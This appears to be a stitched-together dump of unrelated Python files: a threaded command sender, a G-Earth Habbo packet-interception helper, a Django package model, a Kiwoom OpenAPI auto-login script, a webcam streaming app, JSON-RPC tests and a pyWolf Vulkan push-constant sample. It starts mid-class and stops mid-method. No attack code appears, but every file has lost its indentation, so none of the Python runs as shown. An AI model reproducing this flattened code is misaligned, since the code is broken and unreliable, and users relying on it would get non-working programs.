self._respLock = threading.Lock()
self._response = None
self._command = command
self._attemptsLock = threading.Lock()
self._attempts = attempts
self._timeout = timeout/1000.0
self._p = threading.Thread(target=self._Execute)
self._p.daemon = True
self._p.start()
@property
def sending(self):
'''
A property that indicates whether the object is still waiting for a response.
'''
self._sendingLock.acquire()
r = self._sending
self._sendingLock.release()
return r
def _setSending(self, s):
self._sendingLock.acquire()
self._sending = s
self._sendingLock.release()
@property
def response(self):
'''
A property for retrieving the response object generated by the command.
This property should be used when *sending* is ``False``.
'''
if not self._respLock.acquire(False):
return None
r = self._response
self._respLock.release()
return r
def _setResponse(self, R):
self._respLock.acquire()
self._response = R
self._respLock.release()
def StopSending(self):
self._attemptsLock.acquire()
self._attempts = 1
self._attemptsLock.release()
def _Execute(self):
response = None
currentAttempt = 0
self._attemptsLock.acquire()
att = self._attempts
self._attemptsLock.release()
while not response and (att == 0 or currentAttempt < att):
currentAttempt += 1
response = BB.SendAndWait(self._command, self._timeout)
self._attemptsLock.acquire()
att = self._attempts
self._attemptsLock.release()
self._setResponse(response)
self._setSending(False)
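# Usage sketch (hedged): how a caller might poll a ParallelSender. Construction of the
# Command object depends on the BB module and is illustrative only.
#
#   sender = ParallelSender(some_command, timeout=5000, attempts=3)
#   while sender.sending:
#       pass                      # do other work here instead of busy-waiting
#   print(sender.response)        # None if no response arrived within the attempts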
|
hunitytools.py
|
import threading
from .gextension import Extension
from .hmessage import HMessage, Direction
from .hunityparsers import HUnityEntity, HUnityStatus
class UnityRoomUsers:
def __init__(self, ext: Extension, users_in_room=28, get_guest_room=385, user_logged_out=29, status=34):
self.room_users = {}
self.__callback_new_users = None
self.__ext = ext
self.__lock = threading.Lock()
ext.intercept(Direction.TO_CLIENT, self.__load_room_users, users_in_room)
ext.intercept(Direction.TO_SERVER, self.__clear_room_users, get_guest_room)
ext.intercept(Direction.TO_CLIENT, self.__remove_user, user_logged_out)
ext.intercept(Direction.TO_CLIENT, self.__on_status, status)
def __remove_user(self, message: HMessage):
self.__start_remove_user_processing_thread(message.packet.read_int())
def __start_remove_user_processing_thread(self, index: int):
thread = threading.Thread(target=self.__process_remove_user, args=(index,))
thread.start()
def __process_remove_user(self, index: int):
self.__lock.acquire()
try:
if index in self.room_users:
del self.room_users[index]
finally:
self.__lock.release()
def __load_room_users(self, message: HMessage):
users = HUnityEntity.parse(message.packet)
self.__start_user_processing_thread(users)
if self.__callback_new_users is not None:
self.__callback_new_users(users)
def __process_users_in_room(self, entities):
self.__lock.acquire()
try:
for user in entities:
print(f'Adding entity {user}')
self.room_users[user.index] = user
finally:
self.__lock.release()
def __start_user_processing_thread(self, entities):
thread = threading.Thread(target=self.__process_users_in_room, args=(entities,))
thread.start()
def __clear_room_users(self, _):
self.__lock.acquire()
self.room_users.clear()
self.__lock.release()
def on_new_users(self, func):
self.__callback_new_users = func
def __on_status(self, message):
thread = threading.Thread(target=self.__parse_and_apply_updates, args=(message.packet,))
thread.start()
def __parse_and_apply_updates(self, packet):
self.try_updates(HUnityStatus.parse(packet))
def __apply_updates(self, updates):
for update in updates:
self.__lock.acquire()
try:
user = self.room_users[update.index]
if isinstance(user, HUnityEntity):
user.try_update(update)
except KeyError:
pass
finally:
self.__lock.release()
def __start_update_processing_thread(self, updates):
thread = threading.Thread(target=self.__apply_updates, args=(updates,))
thread.start()
def try_updates(self, updates):
self.__start_update_processing_thread(updates)
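# Usage sketch (hedged): wiring UnityRoomUsers to a G-Earth extension. The Extension
# constructor arguments below are hypothetical and depend on the surrounding project.
#
#   ext = Extension(extension_info, sys.argv)   # hypothetical setup
#   room_users = UnityRoomUsers(ext)
#   room_users.on_new_users(lambda users: print(f'{len(users)} entities loaded'))
#   ext.start()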
|
package.py
|
import os
import threading
import uuid
import yaml
from django.db import models
from common.models import JsonTextField
from django.utils.translation import ugettext_lazy as _
from fit2ansible.settings import PACKAGE_DIR
from kubeops_api.package_manage import *
__all__ = ['Package']
class Package(models.Model):
id = models.UUIDField(default=uuid.uuid4, primary_key=True)
name = models.CharField(max_length=20, unique=True, verbose_name=_('Name'))
meta = JsonTextField(blank=True, null=True, verbose_name=_('Meta'))
date_created = models.DateTimeField(auto_now_add=True, verbose_name=_('Date created'))
packages_dir = PACKAGE_DIR
def __str__(self):
return self.name
class Meta:
verbose_name = _('Package')
@property
def path(self):
return os.path.join(self.packages_dir, self.name)
@property
def repo_port(self):
return self.meta['vars']['repo_port']
@property
def registry_port(self):
return self.meta['vars']['registry_port']
@classmethod
def lookup(cls):
for d in os.listdir(cls.packages_dir):
full_path = os.path.join(cls.packages_dir, d)
meta_path = os.path.join(full_path, 'meta.yml')
if not os.path.isdir(full_path) or not os.path.isfile(meta_path):
continue
with open(meta_path) as f:
                metadata = yaml.safe_load(f)
defaults = {'name': d, 'meta': metadata}
instance = cls.objects.update_or_create(defaults=defaults, name=d)[0]
            thread = threading.Thread(target=cls.start_container, args=(instance,))
thread.start()
@classmethod
def start_container(cls, package):
if not is_package_container_exists(package.name):
create_package_container(package)
return
if not is_package_container_start(package.name):
start_package_container(package)
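# Assumed meta.yml layout (hedged): only the keys read by the properties above are known;
# any other fields are project-specific.
#
#   vars:
#     repo_port: 8081        # illustrative values
#     registry_port: 8082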
|
autologin1.py
|
import os
import sys
import time
import pythoncom
from manuallogin import *
from PyQt5 import QtWidgets
from PyQt5.QtCore import QTimer
from multiprocessing import Process
from PyQt5.QAxContainer import QAxWidget
sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))
from utility.setting import openapi_path
class Window(QtWidgets.QMainWindow):
app = QtWidgets.QApplication(sys.argv)
def __init__(self):
super().__init__()
self.bool_connected = False
self.ocx = QAxWidget('KHOPENAPI.KHOpenAPICtrl.1')
self.ocx.OnEventConnect.connect(self.OnEventConnect)
self.CommConnect()
def CommConnect(self):
self.ocx.dynamicCall('CommConnect()')
while not self.bool_connected:
pythoncom.PumpWaitingMessages()
def OnEventConnect(self, err_code):
if err_code == 0:
self.bool_connected = True
self.AutoLoginOn()
def AutoLoginOn(self):
        print('\n Waiting for auto-login setup ...\n')
        QTimer.singleShot(5000, lambda: auto_on(1))
        self.ocx.dynamicCall('KOA_Functions(QString, QString)', 'ShowAccountWindow', '')
        print(' Auto-login setup complete\n')
        print(' Terminating the auto-login setup process ...')
if __name__ == '__main__':
login_info = f'{openapi_path}/system/Autologin.dat'
if os.path.isfile(login_info):
os.remove(f'{openapi_path}/system/Autologin.dat')
        print('\n Auto-login configuration file deleted\n')
    Process(target=Window).start()
    print(' Auto-login setup process started\n')
    while find_window('Open API login') == 0:
        print(' Waiting for the login window to open ...\n')
        time.sleep(1)
    print(' Waiting for ID and password input ...\n')
    time.sleep(5)
    manual_login(2)
    print(' ID and password input complete\n')
|
live_stream_app.py
|
import cv2
import os
import sys
from time import time
from datetime import datetime
import argparse
from imutils.video import FPS
import utils
from threading import Thread
from queue import Queue
def live_stream(cam_id):
""" """
# cam = utils.WebCam(cam_id, 'Live Streaming')
cam = utils.IPCam('https://www.youtube.com/watch?v=psfFJR3vZ78', 'Live Stream')
t_start = datetime.now()
fps = FPS().start()
while True:
if utils.Esc_key_pressed(): break
frame = cam.get_frame()
fps.update()
if frame is None: break
cv2.imshow(cam.name, frame)
fps.stop()
print("Elapsed = {:.2f}".format(fps.elapsed()))
print("FPS = {:.2f}".format(fps.fps()))
cam.close()
class LiveStreamer(object):
"""
"""
def __init__(self, cam_id):
self.cam = utils.WebCam(cam_id, 'Live Stream')
self.fps = FPS().start()
self.in_q = Queue()
self.out_q = Queue()
self.stopped = False
self.threads = []
def start(self):
th = Thread(target=self.frame_preprocess)
th.start()
self.threads.append(th)
th = Thread(target=self.frame_process)
th.start()
self.threads.append(th)
th = Thread(target=self.stream)
th.start()
self.threads.append(th)
def frame_preprocess(self):
while True:
if self.stopped is True: break
frame = self.cam.get_frame()
self.in_q.put(frame)
if frame is None: break
self.stopped = True
def frame_process(self):
while True:
if self.stopped is True: break
frame = self.in_q.get()
if frame is None: break
self.fps.update()
self.out_q.put(frame)
self.in_q.task_done()
self.stopped = True
def stream(self):
while True:
frame = self.out_q.get()
if frame is None: break
cv2.imshow(self.cam.name, frame)
self.out_q.task_done()
self.stopped = True
def stop(self):
self.stopped = True
self.in_q.put(None)
self.out_q.put(None)
for th in self.threads:
th.join()
self.fps.stop()
print("Elapsed = {:.2f} sec".format(self.fps.elapsed()))
print("Frame Rate = {:.2f} fps".format(self.fps.fps()))
self.cam.close()
def start_live_stream(cam_id):
""" """
streamer = LiveStreamer(cam_id)
streamer.start()
while True:
        if utils.Esc_key_pressed(): break
        if streamer.stopped: break
streamer.stop()
def main():
""" script entry point """
parser = argparse.ArgumentParser()
parser.add_argument('-v', '--video', type=str, default='')
args = vars(parser.parse_args())
if args['video']:
video = args['video']
else:
video = 0
live_stream(video)
# start_live_stream(video)
if __name__ == '__main__':
main()
|
test.py
|
import os
import sys
import unittest
import time
import urllib
import threading
import six
from six.moves.urllib import request as urllib_request
from six.moves.urllib import parse as urllib_parse
sys.path.insert(0, os.path.join(os.path.dirname(os.path.abspath(__file__)), '..'))
TEST_DEFAULTS = {
'ROOT_URLCONF': 'jsontesturls',
'DEBUG': True,
'DEBUG_PROPAGATE_EXCEPTIONS': True,
'DATETIME_FORMAT': 'N j, Y, P',
'USE_I18N': False,
'INSTALLED_APPS': (
'jsonrpc',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions'),
'DATABASES': {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': 'test.sqlite3',
},
},
'MIDDLEWARE_CLASSES': (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
),
'AUTHENTICATION_BACKENDS': ('django.contrib.auth.backends.ModelBackend',),
'TEMPLATE_LOADERS': (
'django.template.loaders.filesystem.load_template_source',
'django.template.loaders.app_directories.load_template_source'),
}
from django.conf import settings
settings.configure(**TEST_DEFAULTS)
import django
if hasattr(django, 'setup'):
# Run django.setup() for Django>=1.7
django.setup()
from django.core import management
from django.test import Client
from django.contrib.auth.models import User
from jsonrpc import jsonrpc_method, _parse_sig, Any
from jsonrpc.proxy import ServiceProxy, TestingServiceProxy
from jsonrpc._json import loads, dumps
from jsonrpc.site import validate_params
from jsonrpc.exceptions import *
from jsonrpc._types import *
try:
from collections import OrderedDict
except ImportError:
# Use SortedDict instead of OrderedDict for python < 2.7
# Can be removed when support for Django < 1.7 is dropped
# https://docs.djangoproject.com/en/1.7/releases/1.7/#django-utils-datastructures-sorteddict
from django.utils.datastructures import SortedDict as OrderedDict
def _call(host, req):
return loads(urllib_request.urlopen(host, dumps(req).encode('utf-8')).read().decode('utf-8'))
def start_json_server_thread():
class JSONServer(object):
def _thread_body(self):
try:
from wsgiref.simple_server import make_server
from django.core.handlers.wsgi import WSGIHandler
import django
ver = django.VERSION[:2]
if ver >= (1, 7):
django.setup() # populate app registry for django >= 1.8
if ver <= (1, 7):
management.call_command('syncdb', interactive=False)
else:
management.call_command('migrate', interactive=False)
try:
User.objects.create_user(username='sammeh', email='sam@rf.com', password='password').save()
except:
pass
http = make_server('', 8999, WSGIHandler())
print('Server made. continue={0}'.format(self.continue_serving))
self.event.set() # notify parent thread that the server is ready to serve requests
while self.continue_serving:
print('Waiting for request!')
http.handle_request()
self.n_requests += 1
print('Handled {0} requests!'.format(self.n_requests))
print('Got server stop! requests={0}'.format(self.n_requests))
http.server_close()
print('Server closed!')
except Exception as e:
import traceback
traceback.print_exc()
                print('Error starting server: {0}'.format(e))
finally:
if not self.event.is_set():
self.event.set()
def start(self):
print('Got server start')
self.continue_serving = True
self.n_requests = 0
self.event = threading.Event()
self.t = threading.Thread(target=self._thread_body)
self.t.start()
self.event.wait()
return self
def stop(self):
print('Got stop call')
self.continue_serving = False
try:
proxy = ServiceProxy('http://127.0.0.1:8999/json/', version=2.0)
proxy.jsonrpc.test(string='Hello')['result']
            except: # doesn't matter if this fails
pass
self.t.join(2.0)
return self
return JSONServer().start()
class JSONServerTestCase(unittest.TestCase):
def setUp(self):
self.host = 'http://127.0.0.1:8999/json/'
@jsonrpc_method('jsonrpc.test')
def echo(request, string):
"""Returns whatever you give it."""
return string
@jsonrpc_method('jsonrpc.testAuth', authenticated=True)
def echoAuth(request, string):
return string
@jsonrpc_method('jsonrpc.notify')
def notify(request, string):
pass
@jsonrpc_method('jsonrpc.fails')
def fails(request, string):
raise IndexError
@jsonrpc_method('jsonrpc.strangeEcho')
def strangeEcho(request, string, omg, wtf, nowai, yeswai='Default'):
return [string, omg, wtf, nowai, yeswai]
@jsonrpc_method('jsonrpc.safeEcho', safe=True)
def safeEcho(request, string):
return string
@jsonrpc_method('jsonrpc.strangeSafeEcho', safe=True)
def strangeSafeEcho(request, *args, **kwargs):
return strangeEcho(request, *args, **kwargs)
@jsonrpc_method('jsonrpc.checkedEcho(string=str, string2=str) -> str', safe=True, validate=True)
def protectedEcho(request, string, string2):
return string + string2
@jsonrpc_method('jsonrpc.checkedArgsEcho(string=str, string2=str)', validate=True)
def protectedArgsEcho(request, string, string2):
return string + string2
@jsonrpc_method('jsonrpc.checkedReturnEcho() -> String', validate=True)
def protectedReturnEcho(request, string, string2):
return string + string2
@jsonrpc_method('jsonrpc.authCheckedEcho(Object, Array) -> Object', validate=True)
def authCheckedEcho(request, obj1, arr1):
return {'obj1': obj1, 'arr1': arr1}
@jsonrpc_method('jsonrpc.varArgs(String, String, str3=String) -> Array', validate=True)
def checkedVarArgsEcho(request, *args, **kw):
return list(args) + list(kw.values())
class JSONRPCFunctionalTests(unittest.TestCase):
def test_method_parser(self):
working_sigs = [
('jsonrpc', 'jsonrpc', OrderedDict(), Any),
('jsonrpc.methodName', 'jsonrpc.methodName', OrderedDict(), Any),
('jsonrpc.methodName() -> list', 'jsonrpc.methodName', OrderedDict(), list),
('jsonrpc.methodName(str, str, str ) ', 'jsonrpc.methodName', OrderedDict([('a', str), ('b', str), ('c', str)]), Any),
('jsonrpc.methodName(str, b=str, c=str)', 'jsonrpc.methodName', OrderedDict([('a', str), ('b', str), ('c', str)]), Any),
('jsonrpc.methodName(str, b=str) -> dict', 'jsonrpc.methodName', OrderedDict([('a', str), ('b', str)]), dict),
('jsonrpc.methodName(str, str, c=Any) -> Any', 'jsonrpc.methodName', OrderedDict([('a', str), ('b', str), ('c', Any)]), Any),
('jsonrpc(Any ) -> Any', 'jsonrpc', OrderedDict([('a', Any)]), Any),
]
error_sigs = [
('jsonrpc(str) -> nowai', ValueError),
('jsonrpc(nowai) -> Any', ValueError),
('jsonrpc(nowai=str, str)', ValueError),
('jsonrpc.methodName(nowai*str) -> Any', ValueError)
]
for sig in working_sigs:
ret = _parse_sig(sig[0], list(iter(sig[2])))
self.assertEquals(ret[0], sig[1])
self.assertEquals(ret[1], sig[2])
self.assertEquals(ret[2], sig[3])
for sig in error_sigs:
e = None
try:
_parse_sig(sig[0], ['a'])
except Exception as exc:
e = exc
self.assert_(type(e) is sig[1])
def test_validate_args(self):
sig = 'jsonrpc(String, String) -> String'
M = jsonrpc_method(sig, validate=True)(lambda r, s1, s2: s1+s2)
self.assert_(validate_params(M, {'params': ['omg', 'wtf']}) is None)
E = None
try:
validate_params(M, {'params': [['omg'], ['wtf']]})
except Exception as e:
E = e
self.assert_(type(E) is InvalidParamsError)
def test_validate_args_any(self):
sig = 'jsonrpc(s1=Any, s2=Any)'
M = jsonrpc_method(sig, validate=True)(lambda r, s1, s2: s1+s2)
self.assert_(validate_params(M, {'params': ['omg', 'wtf']}) is None)
self.assert_(validate_params(M, {'params': [['omg'], ['wtf']]}) is None)
self.assert_(validate_params(M, {'params': {'s1': 'omg', 's2': 'wtf'}}) is None)
def test_types(self):
if six.PY2:
assert type(unicode('')) == String
assert type('') == String
assert not type('') == Object
assert not type([]) == Object
assert type([]) == Array
assert type('') == Any
assert Any.kind('') == String
assert Any.decode('str') == String
assert Any.kind({}) == Object
assert Any.kind(None) == Nil
assert type(1) == Number
assert type(1.1) == Number
class ServiceProxyTest(JSONServerTestCase):
def test_positional_args(self):
proxy = ServiceProxy(self.host)
self.assert_(proxy.jsonrpc.test('Hello')['result'] == 'Hello')
try:
proxy.jsonrpc.test(string='Hello')
except Exception as e:
self.assert_(e.args[0] == 'Unsupported arg type for JSON-RPC 1.0 '
'(the default version for this client, '
'pass version="2.0" to use keyword arguments)')
else:
            self.assert_(False, "Proxy didn't warn about version mismatch")
def test_keyword_args(self):
proxy = ServiceProxy(self.host, version='2.0')
self.assert_(proxy.jsonrpc.test(string='Hello')['result'] == 'Hello')
self.assert_(proxy.jsonrpc.test('Hello')['result'] == 'Hello')
def test_testing_proxy(self):
client = Client()
proxy = TestingServiceProxy(client, self.host, version='2.0')
self.assert_(proxy.jsonrpc.test(string='Hello')['result'] == 'Hello')
self.assert_(proxy.jsonrpc.test('Hello')['result'] == 'Hello')
class JSONRPCTest(JSONServerTestCase):
def setUp(self):
super(JSONRPCTest, self).setUp()
self.proxy10 = ServiceProxy(self.host, version='1.0')
self.proxy20 = ServiceProxy(self.host, version='2.0')
def test_10(self):
self.assertEqual(
self.proxy10.jsonrpc.test('this is a string')['result'],
'this is a string')
def test_11(self):
req = {
'version': '1.1',
'method': 'jsonrpc.test',
'params': ['this is a string'],
'id': 'holy-mother-of-god'
}
resp = _call(self.host, req)
self.assertEquals(resp['id'], req['id'])
self.assertEquals(resp['result'], req['params'][0])
def test_10_notify(self):
pass
def test_11_positional_mixed_args(self):
req = {
'version': '1.1',
'method': 'jsonrpc.strangeEcho',
'params': {'1': 'this is a string', '2': 'this is omg',
'wtf': 'pants', 'nowai': 'nopants'},
'id': 'toostrange'
}
resp = _call(self.host, req)
self.assertEquals(resp['result'][-1], 'Default')
self.assertEquals(resp['result'][1], 'this is omg')
self.assertEquals(resp['result'][0], 'this is a string')
self.assert_('error' not in resp)
def test_11_GET(self):
pass
def test_11_GET_unsafe(self):
pass
def test_11_GET_mixed_args(self):
params = {'1': 'this is a string', '2': 'this is omg',
'wtf': 'pants', 'nowai': 'nopants'}
url = "%s%s?%s" % (
self.host, 'jsonrpc.strangeSafeEcho',
(''.join(['%s=%s&' % (k, urllib_parse.quote(v)) for k, v in params.items()])).rstrip('&')
)
resp = loads(urllib_request.urlopen(url).read().decode('utf-8'))
self.assertEquals(resp['result'][-1], 'Default')
self.assertEquals(resp['result'][1], 'this is omg')
self.assertEquals(resp['result'][0], 'this is a string')
self.assert_('error' not in resp)
def test_20_checked(self):
self.assertEqual(
self.proxy10.jsonrpc.varArgs('o', 'm', 'g')['result'],
['o', 'm', 'g']
)
self.assert_(self.proxy10.jsonrpc.varArgs(1,2,3)['error'])
def test_11_service_description(self):
pass
def test_20_keyword_args(self):
self.assertEqual(
self.proxy20.jsonrpc.test(string='this is a string')['result'],
'this is a string')
def test_20_positional_args(self):
self.assertEqual(
self.proxy20.jsonrpc.test('this is a string')['result'],
'this is a string')
def test_20_notify(self):
req = {
'jsonrpc': '2.0',
'method': 'jsonrpc.notify',
'params': ['this is a string'],
'id': None
}
resp = urllib_request.urlopen(self.host, dumps(req).encode('utf-8')).read().decode('utf-8')
self.assertEquals(resp, '')
def test_20_batch(self):
req = [{
'jsonrpc': '2.0',
'method': 'jsonrpc.test',
'params': ['this is a string'],
'id': 'id-'+str(i)
} for i in range(5)]
resp = loads(urllib_request.urlopen(self.host, dumps(req).encode('utf-8')).read().decode('utf-8'))
self.assertEquals(len(resp), len(req))
for i, D in enumerate(resp):
self.assertEquals(D['result'], req[i]['params'][0])
self.assertEquals(D['id'], req[i]['id'])
def test_20_batch_with_errors(self):
req = [{
'jsonrpc': '2.0',
'method': 'jsonrpc.test' if not i % 2 else 'jsonrpc.fails',
'params': ['this is a string'],
'id': 'id-'+str(i)
} for i in range(10)]
resp = loads(urllib_request.urlopen(self.host, dumps(req).encode('utf-8')).read().decode('utf-8'))
self.assertEquals(len(resp), len(req))
for i, D in enumerate(resp):
if not i % 2:
self.assertEquals(D['result'], req[i]['params'][0])
self.assertEquals(D['id'], req[i]['id'])
self.assert_('error' not in D)
else:
self.assert_('result' not in D)
self.assert_('error' in D)
self.assertEquals(D['error']['code'], 500)
def test_authenticated_ok(self):
self.assertEquals(
self.proxy10.jsonrpc.testAuth(
'sammeh', 'password', 'this is a string')['result'],
'this is a string')
def test_authenticated_ok_kwargs(self):
self.assertEquals(
self.proxy20.jsonrpc.testAuth(
username='sammeh', password='password', string='this is a string')['result'],
'this is a string')
def test_authenticated_fail_kwargs(self):
try:
self.proxy20.jsonrpc.testAuth(
username='osammeh', password='password', string='this is a string')
except IOError as e:
self.assertEquals(e.args[1], 401)
else:
            self.assert_(False, "Didn't return status code 401 on unauthorized access")
def test_authenticated_fail(self):
try:
self.proxy10.jsonrpc.testAuth(
'osammeh', 'password', 'this is a string')
except IOError as e:
self.assertEquals(e.args[1], 401)
else:
            self.assert_(False, "Didn't return status code 401 on unauthorized access")
if __name__ == '__main__':
server = None
if os.path.exists('test.sqlite3'):
os.remove('test.sqlite3')
try:
server = start_json_server_thread()
unittest.main(argv=sys.argv)
finally:
if server:
server.stop()
if os.path.exists('test.sqlite3'):
os.remove('test.sqlite3')
|
12_push_constants.py
|
import sys, os
#get path of script
_script_path = os.path.realpath(__file__)
_script_dir = os.path.dirname(_script_path)
pyWolfPath = _script_dir
if sys.platform == "linux" or sys.platform == "linux2":
print "Linux not tested yet"
elif sys.platform == "darwin":
print "OS X not tested yet"
elif sys.platform == "win32":
pyWolfPath = pyWolfPath + "\\..\\..\\..\\..\\bin\\x64\\Debug\\Win32\\"
if pyWolfPath != "" and (not pyWolfPath in sys.path):
sys.path.append(pyWolfPath)
import ctypes, threading, pyWolf
from math import cos
from PySide import QtGui, QtCore
from PySide.QtGui import *
from PySide.QtCore import *
screen_width = 800
screen_height = 600
class gui(QWidget):
def __init__(self, parent=None):
super(gui, self).__init__(parent)
self.debug_text = ""
self._label = QLabel()
self._label.setAlignment(Qt.AlignLeft)
self.color_dialog = QColorDialog()
self.color_dialog.setCurrentColor(QColor(102, 178, 0))
self.color_dialog.setOptions(QColorDialog.NoButtons)
vbox = QVBoxLayout()
vbox.addWidget(self._label)
vbox.addWidget(self.color_dialog)
self.setLayout(vbox)
timer = QTimer(self)
timer.timeout.connect(self.updateTime)
timer.start(50)
def updateTime(self):
self._label.setText(self.debug_text)
class scene(QWidget):
def __init__(self, pContentPath, pLogPath, pAppName, parent = None):
super(scene, self).__init__(parent)
self.__exiting = False
self._game = pyWolf.framework.w_game(pContentPath, pLogPath, pAppName)
self._game.set_pre_init_callback(self.pre_init)
self._game.set_post_init_callback(self.post_init)
self._game.set_load_callback(self.load)
self._game.set_update_callback(self.update)
self._game.set_pre_render_callback(self.pre_render)
self._game.set_post_render_callback(self.post_render)
self._gDevice = None
self._viewport = pyWolf.graphics.w_viewport()
self._viewport_scissor = pyWolf.graphics.w_viewport_scissor()
self._draw_command_buffers = pyWolf.graphics.w_command_buffers()
self._draw_render_pass = pyWolf.graphics.w_render_pass()
self._draw_fence = pyWolf.graphics.w_fences()
self._draw_semaphore = pyWolf.graphics.w_semaphore()
self._shader = pyWolf.graphics.w_shader()
self._mesh = pyWolf.graphics.w_mesh()
self._texture = pyWolf.graphics.w_texture()
#++++++++++++++++++++++++++++++++++++++++++++++++++++
#The following codes have been added for this project
#++++++++++++++++++++++++++++++++++++++++++++++++++++
self._PushConstantColorEdit = [0.4,0.7,0,1]
self._pipeline = pyWolf.graphics.w_pipeline()
#++++++++++++++++++++++++++++++++++++++++++++++++++++
#++++++++++++++++++++++++++++++++++++++++++++++++++++
_config = pyWolf.graphics.w_graphics_device_manager_configs()
_config.debug_gpu = False
self._game.set_graphics_device_manager_configs(_config)
def pre_init(self):
print "pre_init"
def post_init(self):
#get main graphics device
self._gDevice = self._game.get_graphics_device(0)
print self._gDevice.get_info()
print "post_init"
def load(self):
#initialize viewport
self._viewport.y = 0
self._viewport.width = screen_width
self._viewport.height = screen_height
self._viewport.minDepth = 0
self._viewport.maxDepth = 1
#initialize scissor of viewport
self._viewport_scissor.offset.x = 0
self._viewport_scissor.offset.y = 0
self._viewport_scissor.extent.width = screen_width
self._viewport_scissor.extent.height = screen_height
#load render pass which contains frame buffers
_render_pass_attachments = []
_output_window = self._gDevice.output_presentation_window
for _iter in _output_window.swap_chain_image_views:
# COLOR #DEPTH
_render_pass_attachments.append([_iter, _output_window.depth_buffer_image_view])
_hr = self._draw_render_pass.load(self._gDevice, self._viewport, self._viewport_scissor, _render_pass_attachments)
if _hr:
print "Error on loading render pass"
self.release()
sys.exit(1)
#create one semaphore for drawing
_hr = self._draw_semaphore.initialize(self._gDevice)
if _hr:
print "Error on initializing semaphore"
self.release()
sys.exit(1)
#create one fence for drawing
_hr = self._draw_fence.initialize(self._gDevice, 1)
if _hr:
print "Error on initializing fence(s)"
self.release()
sys.exit(1)
        #create primary command buffers, one per swap chain image
number_of_swap_chains = self._gDevice.get_number_of_swap_chains()
_hr = self._draw_command_buffers.load(self._gDevice, number_of_swap_chains, pyWolf.graphics.w_command_buffer_level.PRIMARY)
if _hr:
print "Error on initializing draw command buffer(s)"
self.release()
sys.exit(1)
#loading vertex shader
_content_path_dir = _script_dir + "/content/"
_hr = self._shader.load(self._gDevice, _content_path_dir + "shaders/shader.vert.spv", pyWolf.graphics.w_shader_stage_flag_bits.VERTEX_SHADER)
if _hr:
print "Error on loading vertex shader"
self.release()
sys.exit(1)
#loading fragment shader
_hr = self._shader.load(self._gDevice, _content_path_dir + "shaders/shader.frag.spv", pyWolf.graphics.w_shader_stage_flag_bits.FRAGMENT_SHADER)
if _hr:
print "Error on loading fragment shader"
self.release()
sys.exit(1)
_hr = self._texture.initialize(self._gDevice, 8, 8, False, False)
if _hr:
print "Error on initializing texture"
self.release()
sys.exit(1)
self._texture.set_view_type(pyWolf.graphics.w_image_view_type._2D_ARRAY)
#load texture from file
_hr = self._texture.load_texture_2D_from_file(_content_path_dir + "../../../../../Logo.jpg", True)
if _hr:
print "Error on loading " + _content_path_dir + "../../../../../Logo.jpg"
self.release()
sys.exit(1)
        #we only need vertex position and uv
_vba = pyWolf.graphics.w_vertex_binding_attributes(pyWolf.graphics.w_vertex_declaration.VERTEX_POSITION_UV)
self._mesh.set_vertex_binding_attributes(_vba)
_shader_param_0 = pyWolf.graphics.w_shader_binding_param()
_shader_param_0.index = 0
_shader_param_0.type = pyWolf.graphics.w_shader_binding_type.SAMPLER2D
_shader_param_0.stage = pyWolf.graphics.w_shader_stage_flag_bits.FRAGMENT_SHADER
_shader_param_0.image_info = self._texture.get_descriptor_info()
_hr = self._shader.set_shader_binding_params( [_shader_param_0 ])
if _hr:
print "Set shader binding params"
#loading pipeline cache
_pipeline_cache_name = "pipeline_cache"
_hr = self._pipeline.create_pipeline_cache(self._gDevice, _pipeline_cache_name)
if _hr:
print "Error on creating pipeline cache"
_rasterization_states = pyWolf.graphics.w_graphics_device.defaults_states.pipelines.rasterization_create_info
_multisample_states = pyWolf.graphics.w_graphics_device.defaults_states.pipelines.multisample_create_info
_blend_states = pyWolf.graphics.w_graphics_device.defaults_states.blend_states.premulitplied_alpha
_blend_color = pyWolf.system.w_color.TRANSPARENT_()
#++++++++++++++++++++++++++++++++++++++++++++++++++++
#The following codes have been added for this project
#++++++++++++++++++++++++++++++++++++++++++++++++++++
_push_constant_range = pyWolf.graphics.w_push_constant_range()
_push_constant_range.offset = 0
_push_constant_range.size = 4 * 4 # 4 * sizeof(float)
_push_constant_range.shader_stage_flags = pyWolf.graphics.w_shader_stage_flag_bits.VERTEX_SHADER
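# Note: the range covers 4 floats (16 bytes) -- the RGBA colour kept in
# self._PushConstantColorEdit, which build_command_buffers() records into each
# command buffer via set_push_constant_buffer.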
#create pipeline
_hr = self._pipeline.load(self._gDevice, _vba, pyWolf.graphics.w_primitive_topology.TRIANGLE_LIST, self._draw_render_pass, self._shader, [self._viewport], [ self._viewport_scissor ], _pipeline_cache_name, [], [_push_constant_range], 0, _rasterization_states, _multisample_states, _blend_states, _blend_color)
if _hr:
print "Error on creating pipeline"
self.release()
sys.exit(1)
#++++++++++++++++++++++++++++++++++++++++++++++++++++
#++++++++++++++++++++++++++++++++++++++++++++++++++++
_vertex_data = [
-0.7, -0.7, 0.0, #pos0
0.0, 0.0, #uv0
-0.7, 0.7, 0.0, #pos1
0.0, 1.0, #uv1
0.7, 0.7, 0.0, #pos2
1.0, 1.0, #uv2
0.7, -0.7, 0.0, #pos3
1.0, 0.0, #uv3
]
_index_data = [ 0,1,3,3,1,2 ]
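# The four vertices above form a screen-space quad; the index list draws it as
# two triangles (0,1,3) and (3,1,2), so each corner is stored only once.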
#create mesh
self._mesh.set_texture(self._texture)
_hr = self._mesh.load(self._gDevice, _vertex_data, _index_data, False)
if _hr:
print "Error on loading mesh"
self.release()
sys.exit(1)
print "scene loaded successfully"
def build_command_buffers(self):
_hr = pyWolf.W_PASSED
_size = self._draw_command_buffers.get_commands_size()
for i in xrange(_size):
_cmd = self._draw_command_buffers.get_command_at(i)
_hr = self._draw_command_buffers.begin(i)
if _hr:
print "Error on begining command buffer: " + str(i)
break
self._draw_render_pass.begin(i, _cmd, pyWolf.system.w_color.CORNFLOWER_BLUE(), 1.0, 0)
self._pipeline.bind(_cmd)
#++++++++++++++++++++++++++++++++++++++++++++++++++++
#The following codes have been added for this project
#++++++++++++++++++++++++++++++++++++++++++++++++++++
self._pipeline.set_push_constant_buffer(_cmd, pyWolf.graphics.w_shader_stage_flag_bits.VERTEX_SHADER, 0, self._PushConstantColorEdit)
#++++++++++++++++++++++++++++++++++++++++++++++++++++
